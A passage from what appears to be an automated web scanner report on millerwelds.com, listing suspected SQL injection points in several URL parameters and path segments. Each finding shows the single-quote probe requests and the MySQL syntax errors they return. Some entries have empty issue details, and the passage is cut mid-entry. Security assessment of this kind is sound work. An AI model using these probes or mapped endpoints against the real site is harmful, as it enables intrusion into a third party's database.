</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:33 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B8515BBB2946B5A0577F4A036E8F8BD5; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.104. http://www.millerwelds.com/landing/drive/ [utm_medium parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/landing/drive/

Issue detail

The utm_medium parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_medium parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad'&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:07 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=502FC4F3B0CC4224C24AEB19BC92226F; path=/
Content-Length: 14906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad''&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:09 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=33DA6723A49CE218C1D7BD1E4A7A789A; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.105. http://www.millerwelds.com/landing/drive/ [utm_source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/landing/drive/

Issue detail

The utm_source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_source parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV'&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:18 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5E13222BB78ACE8FA8D536638E608756; path=/
Content-Length: 14906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV''&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:20 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B0FC82155C2EC3F1BBBD167B0997AEA7; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.106. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:58 GMT
Connection: Keep-Alive
Content-Length: 27875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arro' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:59 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...

1.107. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:48 GMT
Connection: Keep-Alive
Content-Length: 27800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:49 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...

1.108. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

Issue detail

The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:22 GMT
Connection: Keep-Alive
Content-Length: 27906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/prod' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:23 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

1.110. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/pdf/001625sites_QMS.pdf

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pdf'/001625sites_QMS.pdf HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:17 GMT
Connection: Keep-Alive
Content-Length: 27701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.111. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/pdf/001625sites_QMS.pdf

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pdf/001625sites_QMS.pdf' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:19 GMT
Connection: Keep-Alive
Content-Length: 27726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/pdf/001625sites_QMS.pdf''' at line 1)<br>
...[SNIP]...

1.112. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/products/accessories/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products'/accessories/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:47 GMT
Connection: Keep-Alive
Content-Length: 27704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.113. http://www.millerwelds.com/products/accessories/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/products/accessories/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:50 GMT
Connection: Keep-Alive
Content-Length: 27982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.114. http://www.millerwelds.com/products/accessories/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/products/accessories/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /products/accessories/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
